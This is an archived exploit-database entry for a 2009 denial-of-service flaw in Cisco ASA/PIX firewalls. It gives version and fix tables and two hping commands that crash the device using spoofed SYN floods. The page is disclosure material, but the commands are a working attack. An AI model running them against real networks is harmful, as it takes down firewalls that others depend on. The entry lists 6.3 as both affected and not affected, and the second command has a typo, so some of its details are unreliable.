Cisco ASA/PIX Denial of Service Vulnerability

vendor:

ASA/PIX

by:

Daniel Uriah Clemens

7.8

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: ASA/PIX

Affected Version From: 6.3

Affected Version To: 8.2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Cisco ASA/PIX Denial of Service Vulnerability

A vulnerability in Cisco ASA/PIX versions 6.3, 7.0, 7.1, 7.2, 8.0, 8.1, and 8.2 can be triggered by sending a specially crafted packet with a large window size. This will cause the device to crash and reload, resulting in a denial of service. The only way to recover from the denial of service is to reload the device.

Mitigation:

Upgrade to the latest version of Cisco ASA/PIX.

Source

Exploit-DB raw data:

The vulnerability affects the following Cisco ASA/PIX versions:

Release     Fixed in:
--------     ---------
6.3        Not affected
7.0        7.0(8.6)   
7.1        7.1(2.81)   
7.2        7.2(4.30)   
8.0        8.0(4.28)   
8.1        8.1(2.19)   
8.2        8.2(0.230)

-----------------------------
Triggering the vuln
------------------------------

/*Utilize  1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2

Reloading the device is the only way to recover from the denial of service.

| Daniel Uriah Clemens
"Moments of sorrow are moments of sobriety" 

# milw0rm.com [2009-04-10]